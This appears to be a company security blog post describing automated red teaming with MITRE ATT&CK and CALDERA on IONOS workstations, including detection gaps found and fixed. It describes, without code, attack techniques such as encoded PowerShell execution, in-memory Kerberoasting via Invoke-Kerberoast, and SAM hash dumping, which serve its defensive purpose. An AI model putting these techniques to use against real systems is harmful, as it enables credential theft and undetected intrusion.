Introduction
Like all global hosting and cloud providers, we regularly find ourselves the target of attacks. Either against our customer infrastructure or against our workstations. In order to find potential gaps before an attacker does, we came up with the plan of automated Red Teaming.
The project ART (Automated Red Teaming) is aimed to conduct adversary emulation on IONOS’ internal infrastructure in order to better understand the actions and techniques that an attacker would use and how our defenses would react to it. For this purpose we use an industry standard threat database called MITRE ATT&CK which acts as a foundation for enterprise red teaming, and MITRE’s open source software called CALDERA that helps automating the adversary emulation process.
Why do we do Red Teaming?
Even though the main focus of ART is to assess our endpoint security and improve it, there are various other reasons for which we utilize the outcome of it. For example, it can help identify and validate if a particular threat group can affect us or not by mapping our security assessment and the techniques used by that threat group to the MITRE ATT&CK matrix. We can also use this information to compare security products to determine which tool is protecting or responding better against these attacks.
How do we perform Red Teaming?
First step to start with the red teaming is to choose the target infrastructure. At IONOS employees can choose between Windows, Linux or macOS on their personal workstations and our solution covers all of them. The MITRE ATT&CKTM database gives information on all known attack techniques used by adversaries on these operating systems in real world scenarios. Most of these techniques can be tested individually by running small scripts or commands on a target. But with ART we run all these attacker commands automatically on a remote target and observe how our security solutions react to each one of them.
Example
If we want to test for a MITRE Technique- T1059.001 Command and Scripting Interpreter: PowerShell, we select this in our software’s web interface and can see 29 different test methods possible for that. We choose one or more of these tests that contain simple powershell commands and run it on the target machine remotely from the web UI. In a few seconds it will start showing up the output of those commands that tells if it ran successfully or not. Meanwhile we check if what we expected was actually detected by the Anti-virus/SIEM/IDS solutions in place. The tests that are not detected as expected are the gaps that impose a risk and need to be fixed. For example we observed that our Anti-Virus was not detecting a test that used powershell to execute an encoded command using the ‘/e’ parameter.
This is a technique often used by malware to avoid detection and download next stage payloads on a target machine. This was fixed by deploying a new Antivirus rule that blocked execution of powershell command lines using the ‘/e’ parameter as there was no legitimate use case for it in the target infrastructure.
Figure 2 : Number of detection gaps that were found and the ones that are fixed so far
Results
As there are more Windows clients used by the IONOS employees we started with that as the first target. We tested around 200 adversary techniques on a test client in the employee network keeping all the security solutions as it is. Out of these 102 techniques ran successfully without any detection by our security solutions. So far we have been able to fix most of these major gaps by adding new AntiVirus rules for the clients as seen below.
Figure 2 : Number of detection gaps that were found and the ones that are fixed so far
The severity of gaps found is usually taken from the Mitre CAPEC database on a rough scale ( Low, Medium, High). For some attack techniques the severity is not given by CAPEC, so an intuitive severity is given based on the likelihood, risk and possible impact of it.
High Risk
Easy to execute using system features and normal user privileges and impact is high like stolen user credentials leading to unauthorized access to an internal server without any detection.
An example: T1558.003 Steal or Forge Kerberos Tickets
An attacker or malicious insider that has access to a domain system can execute PowerSploit’s Invoke-Kerberoast module directly in memory from a remote url and request service tickets that return password hashes for service accounts. This hashed passwords can be exfiltrated and cracked offline by the attacker and later used for privilege escalation and lateral movement with valid account credentials. All this without any detection by our endpoint security.
To mitigate this we created an antivirus rule to monitor if any such powershell module is invoked from an external location. An alternative solution was to enable the AMSI interface on all clients that scans all scripts running in the memory but it wasn’t possible due to technical issues.
- Medium Risk – A bit difficult to execute and requires special privileges or preexisting conditions e.g. dumping windows usernames and hashed passwords from the SAM registry hive with administrative privileges.
- Low risk – Used in correlation with High and Medium Risk techniques mainly for reconnaissance, very similar to legitimate user behavior e.g. running network and system discovery commands or sending out data in encrypted traffic.
In Closing
Most of the traditional security solutions rely on threat IOCs (Indicators of Compromise) like hash values, IP addresses, urls, etc. which are inconsistent and get outdated very soon. It becomes difficult to measure the security level of a network simply based on these IOCs and patch levels. Red Teaming helps us think beyond and evaluate a network from an attacker’s perspective. Using software like CALDERA we can find definite gaps in our security posture, focus on improving those and get measurable metrics for the security level.